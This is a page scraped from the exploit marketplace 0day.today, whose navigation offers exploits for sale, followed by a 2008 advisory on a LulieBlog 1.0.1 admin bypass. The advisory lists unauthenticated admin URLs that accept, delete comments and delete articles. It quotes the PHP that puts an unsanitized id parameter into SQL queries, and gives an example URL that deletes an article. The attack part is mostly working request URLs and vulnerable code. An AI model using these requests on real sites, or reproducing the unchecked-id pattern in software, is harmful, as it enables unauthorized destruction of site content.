0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability
============================================================= LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability ============================================================= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- bug found by ka0x D.O.M TEAM 2008 we are: ka0x, an0de, xarnuz #from spain download: http://www.comscripts.com/scripts/php.lulieblog.2138.html Description: - The bug will allow us to acept sent comments in the articles, erase comments and delete articles accept comments: http://[host]/Admin/comment_accepter.php?id=[id_comment] ------------------ $id=$_GET["id"]; $sql="UPDATE ".PREFIX_TABLES."commentaire SET actif = 1 WHERE idcom = '$id'"; ------------------ delete comments: http://[host]/Admin/comment_refuser.php?id=[id_comment] ------------------ $id=$_GET["id"]; $sql="DELETE FROM ".PREFIX_TABLES."commentaire WHERE idcom = '$id'"; ------------------ delete article: http://[host]/Admin/article_suppr.php?id=[id_article] ------------------ $id=$_GET["id"]; $sql="DELETE FROM ".PREFIX_TABLES."article WHERE numart='$id'"; ------------------ example: --------- http://localhost/lulieblog/Admin/article_suppr.php?id=4 Delete the article with id=4 # 0day.today [2024-12-25] #